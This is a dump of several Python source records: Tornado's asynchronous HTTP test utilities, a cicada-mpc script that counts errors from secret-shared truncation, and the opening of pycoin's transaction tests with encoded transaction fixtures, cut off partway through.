        """Returns the port used by the server.
        A new port is chosen for each test.
        """
        return self.__port
    def get_protocol(self):
        # Scheme used by get_url(); overridden by AsyncHTTPSTestCase.
        return 'http'
    def get_url(self, path):
        """Returns an absolute url for the given path on the test server."""
        return '%s://localhost:%s%s' % (self.get_protocol(),
                                        self.get_http_port(), path)
    def tearDown(self):
        self.http_server.stop()
        # Let in-flight connections finish closing before tearing down
        # the IOLoop.
        self.io_loop.run_sync(self.http_server.close_all_connections,
                              timeout=get_async_test_timeout())
        # Don't close a client bound to the shared global IOLoop instance.
        if (not IOLoop.initialized() or
                self.http_client.io_loop is not IOLoop.instance()):
            self.http_client.close()
        super(AsyncHTTPTestCase, self).tearDown()
class AsyncHTTPSTestCase(AsyncHTTPTestCase):
    """A test case that starts an HTTPS server.
    Interface is generally the same as `AsyncHTTPTestCase`.
    """
    def get_http_client(self):
        # The bundled certificate is self-signed and would never validate,
        # so the test client is configured to skip certificate checks.
        client_defaults = dict(validate_cert=False)
        return AsyncHTTPClient(io_loop=self.io_loop, force_instance=True,
                               defaults=client_defaults)
    def get_httpserver_options(self):
        # Supplying ssl_options is what switches the HTTPServer to TLS.
        return dict(ssl_options=self.get_ssl_options())
    def get_ssl_options(self):
        """May be overridden by subclasses to select SSL options.
        By default includes a self-signed testing certificate.
        """
        # Testing keys were generated with:
        # openssl req -new -keyout tornado/test/test.key -out tornado/test/test.crt -nodes -days 3650 -x509
        test_dir = os.path.join(os.path.dirname(__file__), 'test')
        return dict(
            certfile=os.path.join(test_dir, 'test.crt'),
            keyfile=os.path.join(test_dir, 'test.key'))
    def get_protocol(self):
        return 'https'
def gen_test(func=None, timeout=None):
    """Testing equivalent of ``@gen.coroutine``, to be applied to test methods.
    ``@gen.coroutine`` cannot be used on tests because the `.IOLoop` is not
    already running. ``@gen_test`` should be applied to test methods
    on subclasses of `AsyncTestCase`.
    Example::
        class MyTest(AsyncHTTPTestCase):
            @gen_test
            def test_something(self):
                response = yield gen.Task(self.fetch('/'))
    By default, ``@gen_test`` times out after 5 seconds. The timeout may be
    overridden globally with the ``ASYNC_TEST_TIMEOUT`` environment variable,
    or for each test with the ``timeout`` keyword argument::
        class MyTest(AsyncHTTPTestCase):
            @gen_test(timeout=10)
            def test_something_slow(self):
                response = yield gen.Task(self.fetch('/'))
    .. versionadded:: 3.1
       The ``timeout`` argument and ``ASYNC_TEST_TIMEOUT`` environment
       variable.
    .. versionchanged:: 4.0
       The wrapper now passes along ``*args, **kwargs`` so it can be used
       on functions with arguments.
    """
    if timeout is None:
        timeout = get_async_test_timeout()
    def wrap(f):
        # Stack up several decorators to allow us to access the generator
        # object itself. In the innermost wrapper, we capture the generator
        # and save it in an attribute of self. Next, we run the wrapped
        # function through @gen.coroutine. Finally, the coroutine is
        # wrapped again to make it synchronous with run_sync.
        #
        # This is a good case study arguing for either some sort of
        # extensibility in the gen decorators or cancellation support.
        @functools.wraps(f)
        def pre_coroutine(self, *args, **kwargs):
            # Capture the generator object (if any) so a later timeout can
            # be thrown into it, producing a useful stack trace.
            result = f(self, *args, **kwargs)
            if isinstance(result, GeneratorType):
                self._test_generator = result
            else:
                self._test_generator = None
            return result
        coro = gen.coroutine(pre_coroutine)
        @functools.wraps(coro)
        def post_coroutine(self, *args, **kwargs):
            try:
                return self.io_loop.run_sync(
                    functools.partial(coro, self, *args, **kwargs),
                    timeout=timeout)
            except TimeoutError as e:
                # run_sync raises an error with an unhelpful traceback.
                # If we throw it back into the generator the stack trace
                # will be replaced by the point where the test is stopped.
                if self._test_generator is None:
                    # The test body was not a generator (e.g. it returned a
                    # Future directly), so there is nothing to throw the
                    # timeout into; propagate it instead of failing with an
                    # AttributeError on None.
                    raise
                self._test_generator.throw(e)
                # In case the test contains an overly broad except clause,
                # we may get back here. In this case re-raise the original
                # exception, which is better than nothing.
                raise
        return post_coroutine
    if func is not None:
        # Used like:
        # @gen_test
        # def f(self):
        # pass
        return wrap(func)
    else:
        # Used like @gen_test(timeout=10)
        return wrap
# Without this attribute, nosetests will try to run gen_test as a test
# anywhere it is imported.
gen_test.__test__ = False
class LogTrapTestCase(unittest.TestCase):
    """A test case that captures and discards all logging output
    if the test passes.
    Some libraries can produce a lot of logging output even when
    the test succeeds, so this class can be useful to minimize the noise.
    Simply use it as a base class for your test case. It is safe to combine
    with AsyncTestCase via multiple inheritance
    (``class MyTestCase(AsyncHTTPTestCase, LogTrapTestCase):``)
    This class assumes that only one log handler is configured and
    that it is a `~logging.StreamHandler`. This is true for both
    `logging.basicConfig` and the "pretty logging" configured by
    `tornado.options`. It is not compatible with other log buffering
    mechanisms, such as those provided by some test runners.
    .. deprecated:: 4.1
       Use the unittest module's ``--buffer`` option instead, or `.ExpectLog`.
    """
    def run(self, result=None):
        # Make sure the root logger has at least one handler to swap out.
        root_logger = logging.getLogger()
        if not root_logger.handlers:
            logging.basicConfig()
        handler = root_logger.handlers[0]
        if (len(root_logger.handlers) > 1 or
                not isinstance(handler, logging.StreamHandler)):
            # Logging has been configured in a way we don't recognize,
            # so just leave it alone.
            super(LogTrapTestCase, self).run(result)
            return
        old_stream = handler.stream
        try:
            # Redirect log output into a throwaway buffer for the
            # duration of the test.
            handler.stream = StringIO()
            gen_log.info("RUNNING TEST: " + str(self))
            errors_before = len(result.failures) + len(result.errors)
            super(LogTrapTestCase, self).run(result)
            # Replay the captured output only if the test added a
            # failure or error.
            if len(result.failures) + len(result.errors) != errors_before:
                old_stream.write(handler.stream.getvalue())
        finally:
            handler.stream = old_stream
class ExpectLog(logging.Filter):
    """Context manager to capture and suppress expected log output.
    Useful to make tests of error conditions less noisy, while still
    leaving unexpected log entries visible. *Not thread safe.*
    The attribute ``logged_stack`` is set to true if any exception
    stack trace was logged.
    Usage::
        with ExpectLog('tornado.application', "Uncaught exception"):
            error_response = self.fetch("/some_page")
    .. versionchanged:: 4.3
       Added the ``logged_stack`` attribute.
    """
    def __init__(self, logger, regex, required=True):
        """Constructs an ExpectLog context manager.
        :param logger: Logger object (or name of logger) to watch. Pass
            an empty string to watch the root logger.
        :param regex: Regular expression to match. Any log entries on
            the specified logger that match this regex will be suppressed.
        :param required: If true, an exception will be raised if the end of
            the ``with`` statement is reached without matching any log entries.
        """
        # A logger may be given either directly or by name.
        self.logger = (logging.getLogger(logger)
                       if isinstance(logger, basestring_type) else logger)
        self.regex = re.compile(regex)
        self.required = required
        self.matched = False
        self.logged_stack = False
    def filter(self, record):
        # Remember whether any record carried a traceback.
        if record.exc_info:
            self.logged_stack = True
        # Suppress (return False) records matching the expected pattern.
        if self.regex.match(record.getMessage()) is not None:
            self.matched = True
            return False
        return True
    def __enter__(self):
        self.logger.addFilter(self)
        return self
    def __exit__(self, typ, value, tb):
        self.logger.removeFilter(self)
        # Only complain about a missing match when the block exited
        # cleanly; an exception already explains what went wrong.
        if typ or not self.required or self.matched:
            return
        raise Exception("did not get expected log message")
def main(**kwargs):
    """A simple test runner.
    This test runner is essentially equivalent to `unittest.main` from
    the standard library, but adds support for tornado-style option
    parsing and log formatting.
    The easiest way to run a test is via the command line::
        python -m tornado.testing tornado.test.stack_context_test
    See the standard library unittest module for ways in which tests can
    be specified.
    Projects with many tests may wish to define a test script like
    ``tornado/test/runtests.py``. This script should define a method
    ``all()`` which returns a test suite and then call
    `tornado.testing.main()`. Note that even when a test script is
    used, the ``all()`` test suite may be overridden by naming a
    single test on the command line::
        # Runs all tests
        python -m tornado.test.runtests
        # Runs one test
        python -m tornado.test.runtests tornado.test.stack_context_test
    Additional keyword arguments passed through to ``unittest.main()``.
    For example, use ``tornado.testing.main(verbosity=2)``
    to show many test details as they are run.
    See http://docs.python.org/library/unittest.html#unittest.main
    for full argument list.
    """
    from tornado.options import define, options, parse_command_line
    define('exception_on_interrupt', type=bool, default=True,
           help=("If true (default), ctrl-c raises a KeyboardInterrupt "
                 "exception. This prints a stack trace but cannot interrupt "
                 "certain operations. If false, the process is more reliably "
                 "killed, but does not print a stack trace."))
    # support the same options as unittest's command-line interface
    for flag in ('verbose', 'quiet', 'failfast', 'catch', 'buffer'):
        define(flag, type=bool)
    argv = [sys.argv[0]] + parse_command_line(sys.argv)
    if not options.exception_on_interrupt:
        signal.signal(signal.SIGINT, signal.SIG_DFL)
    # Translate any flags that were given into unittest.main keyword
    # arguments.  Later entries deliberately override earlier ones, so
    # --quiet beats --verbose, matching the original chain of ifs.
    for flag, kwarg, value in (('verbose', 'verbosity', 2),
                               ('quiet', 'verbosity', 0),
                               ('failfast', 'failfast', True),
                               ('catch', 'catchbreak', True),
                               ('buffer', 'buffer', True)):
        if getattr(options, flag) is not None:
            kwargs[kwarg] = value
    if __name__ == '__main__' and len(argv) == 1:
        print("No tests specified", file=sys.stderr)
        sys.exit(1)
    try:
        # In order to be able to run tests by their fully-qualified name
        # on the command line without importing all tests here,
        # module must be set to None. Python 3.2's unittest.main ignores
        # defaultTest if no module is given (it tries to do its own
        # test discovery, which is incompatible with auto2to3), so don't
        # set module if we're not asking for a specific test.
        if len(argv) > 1:
            unittest.main(module=None, argv=argv, **kwargs)
        else:
            unittest.main(defaultTest="all", argv=argv, **kwargs)
    except SystemExit as e:
        # Record the overall outcome in the log, then let the exit
        # propagate as unittest.main intended.
        if e.code == 0:
            gen_log.info('PASS')
        else:
            gen_log.error('FAIL')
        raise
if __name__ == '__main__':
    # Allow "python -m tornado.testing <test names>" to act as a test runner.
    main()
| 37.493113 | 107 | 0.637472 |
7738156267e2fb9e5ec1654f36f4f55408e0e63b | 5,679 | py | Python | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | 5 | 2021-06-30T17:31:56.000Z | 2022-03-21T18:59:57.000Z | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | 36 | 2021-07-06T16:38:32.000Z | 2022-03-28T03:14:20.000Z | examples/truncsets.py | cicada-mpc/cicada-mpc | 3b4a1e6b950e90e43e56d9c0f7d11e639f462d81 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from statistics import mean, stdev
import logging
import numpy
import cicada.communicator
import cicada.encoder
import cicada.additive
from tqdm import tqdm
import sys
# Field sizes (in bits) mapped to suitable primes for the fixed field.
primeDict = {64: 2**64-59, 62: 2**62-57, 60: 2**60-93, 58: 2**58-27,
             56: 72057594037927931, 54: 10420223883547487, 48: 149418408868787}
numPrimeBits = 64  # Pick a value from the preceding dictionary
numTruncBits = 16  # Number of low-order bits removed by truncation
testVal = 2**14  # Secret value fed into the truncation test
expected = testVal/2**numTruncBits  # Result a correct truncation should reveal
logend = '.log'
plotend = '.png'
# Number of truncation rounds; optionally overridden by the first CLI
# argument.  Only the expected failure modes are caught here (argument
# missing, or not an integer) -- a bare except would also swallow
# KeyboardInterrupt/SystemExit.
try:
    numRuns = int(sys.argv[1])
except (IndexError, ValueError):
    numRuns = 10000
fnameprefix = 'lotsOtruncs_'+str(numRuns)
batchsize = 1000  # Progress/error counts are reported per batch of this size
batchErrors = {}  # batch index -> number of truncation errors observed
logging.basicConfig(level=logging.INFO)
# Runs the truncation experiment across three MPC players; the decorator
# spawns the players and passes each its communicator.
@cicada.communicator.NNGCommunicator.run(world_size=3)
def main(communicator):
    # Repeatedly secret-share testVal, truncate it, and tally how often the
    # probabilistic truncation protocol produces a wrong result.  Results
    # are printed and written to fnameprefix + logend.
    log = cicada.Logger(logging.getLogger(), communicator)
    #Works pretty reliably with a 54 bit prime, gets unstable in a hurry with bigger than 54 bits, very reliably with 48 bits or smaller
    #Suspicions lie with things getting inappropriately cast as Numpy ints again.
    # default 64 bit prime: 18446744073709551557 = (2^64)-59
    # 56 bit prime: 72057594037927931 = (2^56-5) or 52304857833066023 a safe prime
    # 54 bit prime: 10420223883547487
    # 48 bit prime: 149418408868787
    # 32 bit prime: 4034875883
    # small prime: 7919
    encoder = cicada.encoder.FixedFieldEncoder(primeDict[numPrimeBits], numTruncBits)
    protocol = cicada.additive.AdditiveProtocol(communicator)
    errs = []
    errDict = {}  # observed error value -> occurrence count
    maxErr = 0
    success = False  # set True only if the whole loop completes
    numErrs = 0
    loopCount = 0
    try:
        for i in tqdm(range(numRuns), ascii=True):
            # if i and (i%batchsize) == 0:
            #     communicator.barrier()
            loopCount = int(i)+1
            # Player 0 contributes the secret; all players hold shares.
            secret2trunc = protocol.secret(encoder=encoder, src=0, value=numpy.array(testVal))
            revealedsecret = protocol.reveal(secret2trunc)
            # log.info(f"Player {communicator.rank} revealed: {revealedsecret} expected: {testVal}")
            # print('top op: ', secretly32)
            # trunc_werr returns the truncated share along with the error
            # relative to the exact result.
            secretTruncd,err = protocol.trunc_werr(operand = secret2trunc)
            revealedSecretTruncd = protocol.reveal(secretTruncd)
            # log.info(f"Player {communicator.rank} revealed: {revealedSecretTruncd} expected: {expected}")
            batchID = i//batchsize
            if batchID not in batchErrors:
                batchErrors[batchID] = 0
                if batchID >= 1:
                    print(f'Errors in batch {batchID}: {batchErrors[batchID-1]}')
            if abs(err) > abs(maxErr):
                maxErr = err
            if err != 0:
                numErrs += 1
                batchErrors[batchID] += 1
                if err in errDict:
                    errDict[err] += 1
                else:
                    errDict[err] = 1
        # Full run completed: write the tallies out.
        with open(fnameprefix+logend, 'w') as fout:
            # fout.write(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
            # fout.write(f'\n\nMax observed error: {maxErr}')
            fout.write(f'\n\nTotal number of error instances: {numErrs}')
            fout.write(f'\nNum Successful truncs: {loopCount}\n')
            # print(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
            # print(f'Max observed error: {maxErr}')
            print(f'Total number of error instances: {numErrs}')
            print(f'Num Successful truncs: {loopCount}')
            print('########## <batchNum>,<errcount>')
            for k,v in batchErrors.items():
                print(f'batch num: {k}\t errors: {v}')
                fout.write(f'{k},{v}\n')
            labels = []
            heights = []
            for k, v in errDict.items():
                fout.write(f'{k},{v}\n')
                labels.append(k)
                heights.append(v)
            # fig = plt.figure()
            # ax = fig.add_axes([0,0,1,1,])
            # ax.bar(labels, heights)
            # plt.savefig(fnameprefix+plotend)
        success = True
    finally:
        # If the loop aborted early, still dump whatever was collected.
        if not success:
            with open(fnameprefix+logend, 'w') as fout:
                # fout.write(f'Errors observed mean: {mean(errs)} stdev: {stdev(errs)}')
                # fout.write(f'\nMax observed error: {maxErr}')
                fout.write(f'\nTotal number of error instances: {numErrs}')
                fout.write(f'\nNum Successful truncs: {loopCount}\n')
                print('########## <batchNum>,<errcount>')
                for k,v in batchErrors.items():
                    print(f'batch num: {k}\t errors: {v}')
                    fout.write(f'{k},{v}\n')
                labels = []
                heights = []
                for k, v in errDict.items():
                    fout.write(f'{k},{v}\n')
                    labels.append(k)
                    heights.append(v)
                # fig = plt.figure()
                # ax = fig.add_axes([0,0,1,1,])
                # ax.bar(labels, heights)
                # plt.savefig(fnameprefix+plotend)
main()
| 41.452555 | 136 | 0.598345 |
7e814ae1065867a739b4253287534db4fd3629a7 | 11,801 | py | Python | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 5 | 2017-12-15T13:40:50.000Z | 2021-12-18T13:18:54.000Z | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 1 | 2018-08-06T03:48:14.000Z | 2018-09-03T03:01:03.000Z | tests/tx_test.py | GRS-Community/pycoin | 4a9b9722c91e2831519ddf9675fe8c70246432b7 | [
"MIT"
] | 6 | 2018-08-24T18:49:47.000Z | 2021-01-19T10:04:08.000Z | import binascii
import unittest
from pycoin.serialize import b2h, h2b_rev
from pycoin.tx.Tx import Tx
# Raw hex of transaction
# e1a18b843fc420734deeb68ff6df041a2585e1a0d7dbf3b82aab98291a6d9952,
# which has two outputs (the second pay-to-script-hash -- see test_tx_api);
# fixture for test_tx_api and test_blanked_hash below.
TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX = (
    "0100000001a8f57056b016d7d243fc0fc2a73f9146e7e4c7766ec6033b5ac4cb89c64e"
    "19d0000000008a4730440220251acb534ba1b8a269260ad3fa80e075cd150d3ffba76a"
    "d20cd2e8178dee98b702202284f9c7eae3adfcf0857a901cd34f0ea338d5744caab88a"
    "fad5797be643f7b7014104af8385da9dc85aa153f16341a4015bc95e7ff57876b9bde4"
    "0bd8450a5723a05c1c89ff2d85230d2e62c0c7690b8272cf85868a0a0fc02f99a5b793"
    "f22d5c7092ffffffff02bb5b0700000000001976a9145b78716d137e386ae2befc4296"
    "d938372559f37888acdd3c71000000000017a914c6572ee1c85a1b9ce1921753871bda"
    "0b5ce889ac8700000000")
class TxTest(unittest.TestCase):
    # Tests for the pycoin Tx transaction class: basic API, the
    # blanked-hash calculation, and the signature-validation regression
    # from issue #39.
    def test_tx_api(self):
        tx = Tx.from_hex(TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX)
        # this transaction is a pay-to-hash transaction
        self.assertEqual(tx.id(), "e1a18b843fc420734deeb68ff6df041a2585e1a0d7dbf3b82aab98291a6d9952")
        self.assertEqual(tx.txs_out[0].bitcoin_address(), "19LemzJ3XPdUxp113uynqCAivDbXZBdBy3")
        self.assertEqual(tx.txs_out[1].bitcoin_address(), "3KmkA7hvqG2wKkWUGz1BySioUywvcmdPLR")
    def test_blanked_hash(self):
        # blanked_hash must be insensitive to input scripts (they are
        # blanked out) but sensitive to output values.
        tx = Tx.from_hex(TX_E1A18B843FC420734DEEB68FF6DF041A2585E1A0D7DBF3B82AAB98291A6D9952_HEX)
        self.assertEqual(tx.id(), "e1a18b843fc420734deeb68ff6df041a2585e1a0d7dbf3b82aab98291a6d9952")
        self.assertEqual(
            b2h(tx.blanked_hash()), "909579526c4c2c441687c7478d3f96249724d2ff071d2272b44500d6cf70d5d6")
        # Changing an input script leaves the blanked hash unchanged...
        tx.txs_in[0].script = b"foo"
        self.assertEqual(
            b2h(tx.blanked_hash()), "909579526c4c2c441687c7478d3f96249724d2ff071d2272b44500d6cf70d5d6")
        # ...but changing an output value changes it.
        tx.txs_out[0].coin_value += 1
        self.assertEqual(
            b2h(tx.blanked_hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
        tx.txs_in[0].script = b"bar"
        self.assertEqual(
            b2h(tx.blanked_hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
        # With an empty input script, the regular hash equals the blanked
        # hash; with a non-empty script the regular hash differs.
        tx.txs_in[0].script = b""
        self.assertEqual(b2h(tx.hash()), "10d4e87f7bf35f2949e7693e7a4a84189aad8631f0b2b0999e88f7261066cbe5")
        tx.txs_in[0].script = b"foo"
        self.assertEqual(b2h(tx.hash()), "c91910058722f1c0f52fc5c734939053c9b87882a9c72b609f21632e0bd13751")
    def test_issue_39(self):
        """
        See https://github.com/richardkiss/pycoin/issues/39 and
        https://github.com/richardkiss/pycoin/pull/40
        There was a problem validating the following transactions:
        315ac7d4c26d69668129cc352851d9389b4a6868f1509c6c8b66bead11e2619f
        dbf38261224ebff0c455c405e2435cfc69adb6b8a42d7b10674d9a4eb0464dca
        de744408e4198c0a39310c8106d1830206e8d8a5392bcf715c9b5ec97d784edd
        This codes tests this.
        """
        TX_B64_LIST = [
            # some encoded transactions (the three listed above and the three
            # that they depend upon)
            (
                "AQAAAALcOOk1m9faO1g4YgThhtlAhoX0J/XlE2ZttzWqimshaQAAAABqRzBE"
                "AiBdj+6zEkeORo0LUU5j4ROVjXIU+lcqzYcHmn8MwCb8XAIgD6duoFvyQ69t"
                "D5F38kHK9gbQH8/V5i1r77yiTlaeXCcDIQIQChqcosGJMtZXfFjyJVgBhNDg"
                "gibUGVmHSslj48Gy/v/////cOOk1m9faO1g4YgThhtlAhoX0J/XlE2ZttzWq"
                "imshaQEAAABrSDBFAiAIft44cp5tNeT1FVBQGOZZIiAxJztzZpIPOT7jqxe8"
                "HgIhAMpDFkt1fRptEjXxMgDUtfdt2P2k7J/ChUay31sSEejfAyECdZg5E+YA"
                "k7dn6FWXypOX+y9Bjlf5mNavu8U2EWCFscv/////AUCJlQAAAAAAGXapFPzJ"
                "s204z1XX1bTuTd22ssF2EvSMiKwAAAAA"
            ),
            (
                "AQAAAAEtUf3HWib/PGE4Ag4am7QPH6tuOc6W/q4yGMmuA14AqwEAAABrSDBF"
                "AiEA5PGlIZB+UPxE0zEy7pjJcVpk350sKGDj4EdMUhq4U34CIDCvjTUGpTUu"
                "KwVkRazYVaQtNycOlKYpp7KLIYcOxtdhASEDgIxJPwYZkNK+AB5A8EiuiHAy"
                "C3SJXOLZZS88HHPNbyz/////AvCHSwAAAAAAGXapFPzJs204z1XX1bTuTd22"
                "ssF2EvSMiKzwh0sAAAAAABl2qRQzzvYXSdEboq3wkaXgRWeBd/46bYisAAAA"
                "AA=="
            ),
            (
                "AQAAAAJa+fLO2OCiRk98qhSvobvRyPsY3qrl0QEZa1jcIn70rgAAAABqRzBE"
                "AiANKFITbLHEu93eBOx29YHRsyockZFIyF+8D9BWXTWK8wIgNvKqF87Ind6w"
                "A3aigYv3KMRHmSgLnyBExWkad7Dc2WwDIQIQChqcosGJMtZXfFjyJVgBhNDg"
                "gibUGVmHSslj48Gy/v////9a+fLO2OCiRk98qhSvobvRyPsY3qrl0QEZa1jc"
                "In70rgEAAABrSDBFAiEA9APIYMTjztPlIyyzWCXnk3It+vCsLwGWGpN4K0kG"
                "qWMCIGLdifJz5mvPrW8FqLDNJrp7Bma+/Qw9pF2feVcX2lBKAyECdZg5E+YA"
                "k7dn6FWXypOX+y9Bjlf5mNavu8U2EWCFscv/////AaAClAAAAAAAGXapFOUK"
                "XY2jOZUbBAutBFPXxAz9dNPciKwAAAAA"
            ),
            (
                "AQAAAAGfYeIRrb5mi2ycUPFoaEqbONlRKDXMKYFmaW3C1MdaMQAAAABsSTBG"
                "AiEAhIisrGQ/6Sa7DAJtv+pa9nMiHuBTLNAkxlyzDjYvGEQCIQCFH27K+zjJ"
                "ItZHnrCORpOhrBnHvPnUX8mqXy1pGB/4ngEhAhAKGpyiwYky1ld8WPIlWAGE"
                "0OCCJtQZWYdKyWPjwbL+/////wKgxEoAAAAAABl2qRT8ybNtOM9V19W07k3d"
                "trLBdhL0jIisoMRKAAAAAAAZdqkUM872F0nRG6Kt8JGl4EVngXf+Om2IrAAA"
                "AAA="
            ),
            (
                "AQAAAALCBkSoNGHOnUgtcCy8I87ODdMmW1WL56GNNOIWvaccAAAAAABrSDBF"
                "AiAxKffbGKLs4sDhPFwLZvQlHX+Q20uxr0hFzQqtnSQZQAIhAImY0R1z7HrT"
                "Tt4hR0R/3n3eS8LXk14G94/O8Pc7LDlmAyECE2UQ39BTBuo0mCvz395yuOSd"
                "QyqYBb9kUtOZTnkvnRn/////yRF9O6xy+bn8PWf3KNM1uywKHCYWOL0bgEe1"
                "Zd1jGaIAAAAAakcwRAIgRQ7h/BpT6uurhfpEmEE/Xx5OAZdUohj+Euzr3Zg8"
                "mbkCIDxIakZ02TMLAtt5OHKyy0VQw7uywxjyis6540zeNZdJAyED78tvrsro"
                "6386Jta3YJd/I64guTuYS8oof9K4PDGZeHD/////AeD9HAAAAAAAGXapFB0x"
                "6lo758/yr1vtc3EOtvXV9n1wiKwAAAAA"
            ),
            (
                "AQAAAAKerCh2TFeXmFaXU1qdQUucoCL5WRFVNZdvNt1FZgp5XQAAAACMSTBG"
                "AiEAvLz97Qz/zSlKSDrllLRwj73G2B7RfaiR1ZspOG5Ae3kCIQD5ATZgiNvH"
                "X8Tn8Ib8RohgW0HGbPRi00XUcvxCTmybGgFBBCsXId9LDBz91gENMCmVXxRE"
                "ZI+E6QOSkToVTtny7tiOJhmHy/jci4KzQmucvUBotsK5r4CiwjhjOkAAXRD6"
                "SWD/////6864dM1/4fxjvltUc0HJ1da9agsSw4LV3KYhGR7FJ+MBAAAAi0gw"
                "RQIhAJIopjUy7dPOHa+LGTvgM4jfZ8pA522/Jx3+uFC4Lz5IAiBzLNoxejaa"
                "dw1CXwOUuzI4rMl0xsuYC5XQaxZNT2TFzwFBBBPpriULEjb9VdVoC8v3E4is"
                "RMmfQByPCJYadSwK/ZZg9TTFGyDXUwW+dQ9tScDzhMWfdLK9DyV4iAbnYh/S"
                "2cr/////A0BCDwAAAAAAGXapFFzGycfh13x6rrUPhNJNj2ViE7xbiKwACT0A"
                "AAAAABl2qRQhQVEH8cwnc3//rGPcfvakBANJxIistBcsAAAAAAAZdqkUMQV+"
                "QpfDgBAsCQ+ixaUK5Kgl0kOIrAAAAAA="
            ),
            (
                "AQAAAAO1CFlm1mEB3fjCtilQEH+6TbR3UzdJyqafj3mab9Mc6gAAAACKRzBE"
                "AiA8rWZ4BB8YYJp3xtx8jAZdrfQ6B0zjYRdgTS7I5LZF7gIgabCjn9iu9L3n"
                "YvKrdXFJJygtbg6V8iMTLrPh8ghdGvwBQQQrFyHfSwwc/dYBDTAplV8URGSP"
                "hOkDkpE6FU7Z8u7YjiYZh8v43IuCs0JrnL1AaLbCua+AosI4YzpAAF0Q+klg"
                "/////8IGRKg0Yc6dSC1wLLwjzs4N0yZbVYvnoY004ha9pxwAAQAAAItIMEUC"
                "IDNZYWLuCV0nJL6CCGgUfQfNoh0oAACd2lMZn+zJdJCDAiEAqZafa18G1K1x"
                "/6yOvj8h1uAGSM8UjSJJ6479li5sos4BQQTswrqYR5m+x0vFTzgGrrM2k+Gx"
                "gX+hDBAvN8Kq9RRuWdqC4jVNGhGdFD63Ev1TQYXMqvp6b9ztbAZ3ED8i6sFo"
                "/////0Vf19DzvUs2DvFwlVW9viTF+YlXCNYNMD6yUXK9I9RBAgAAAItIMEUC"
                "IQCKbaQY2eH1fsXZFksstrP4B+uxPBwGRe2Wxl7rW5sYGwIgVvVEPdnJNvVj"
                "rh0XZdhqnOAA0Sw39Upqkejrm+yXWnwBQQQ1hDJBuzoTc1ZJ8zyVQjEfRcjW"
                "o8rq3lE+3x3rYZ3Q/9xBEBtsnkFAzps/N8n6C5cK2QAmRGxeGFmbYaGFT5RP"
                "/////wNAQg8AAAAAABl2qRSU70Qwi2d2bI+nKnCP19XGsbSnWoisVEkwAAAA"
                "AAAZdqkUgroT7ai54LzKPXVnWJsPoV6lJ0yIrHjrFQAAAAAAGXapFEFyZV9I"
                "izJXnWmTivO2n9OKDWCdiKwAAAAA"
            ),
            (
                "AQAAAAHBHumhtHyFj2ma501AFchO/RrrfkY1sYTKsJiYe6i5pAEAAADaAEcw"
                "RAIgJQsMj5xe4yyGSQOseNBu7zuQNbdwYRpmu4tyOeVrDhoCIHTRJ5lHr5OH"
                "JsmDYl4nTEMhT2TeEN8tMNtrt/rFLMaHAUgwRQIhAObKZ2o5NubR2aoXKP7q"
                "oNMI3sv4u33Hnxcu1NBCilhoAiAH5OaEGAC5snVQDIWgXXVWICosFmTHHjXg"
                "y5fNwAO5gAFHUiECzr9qtYCUjRRrfMdx2OZGl0NJ09exHz4DKH0Jl6R307kh"
                "A3umUUhbeiyyIhketkpVkm5iu6v+m17SqUiKrVR7IEKCUq7/////An1KDwAA"
                "AAAAGXapFNxnIa33YyARGtMFwzhMdn1LmeGViKxllyYPAAAAABepFNsSg3N8"
                "2T68HrEpjWRKeEbFWm2WhwAAAAA="
            ),
            (
                "AQAAAAHZI2Rm7Gvz7UMEKi20P7AIT5AOxlhwW29S0uFz9EPz1QEAAADaAEgw"
                "RQIhAIX1NZuYzrKUHFAxUNYI6yWMUuzCEapuZOUY6TdCspWaAiAchzgPP6if"
                "WNh0cmVkyW1UpygM/eVa1XrtHepCMhvArAFHMEQCIGLJtKtbyJEaH6iQS+hK"
                "xUlGrWwmqdJScz/JfSZ1Qln6AiBNRC+gswEEMjTNR5uVetqCGJkNL2m6fDfk"
                "DyICU/otoQFHUiECzr9qtYCUjRRrfMdx2OZGl0NJ09exHz4DKH0Jl6R307kh"
                "A3umUUhbeiyyIhketkpVkm5iu6v+m17SqUiKrVR7IEKCUq7/////Aux5CAAA"
                "AAAAGXapFDIKbLrYWAn/2ZTB7ToisbIaZ5DoiKzL5TUPAAAAABepFNsSg3N8"
                "2T68HrEpjWRKeEbFWm2WhwAAAAA="
            ),
            ( # 837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba
                "AQAAAAGsp/O0VlTCMOCIalf7mIwwRO9ej385cm0wXGHV6BiQPAAAAAD9XQEAS"
                "DBFAiABh6+Sjp0VXEsaycHJEYFTI5q6dndPd118H5w+EG/zPAIhAIgisPZY7e"
                "wiJ00LauneEOvy2gaxu9qrpOUOsHjznj14AUcwRAIgeV8PT1lBp3rgMuy54zd"
                "TeI1+tcsMeNgFV11rAKHZv+0CID4fStkzLRQWrgHicDjpRbydtZxzJyijg6bx"
                "7S+5naekAUzJUkEEkbuiUQkSpb032h+1sWcwEOQ9LG2BLFFOkb+p8usSnhwYM"
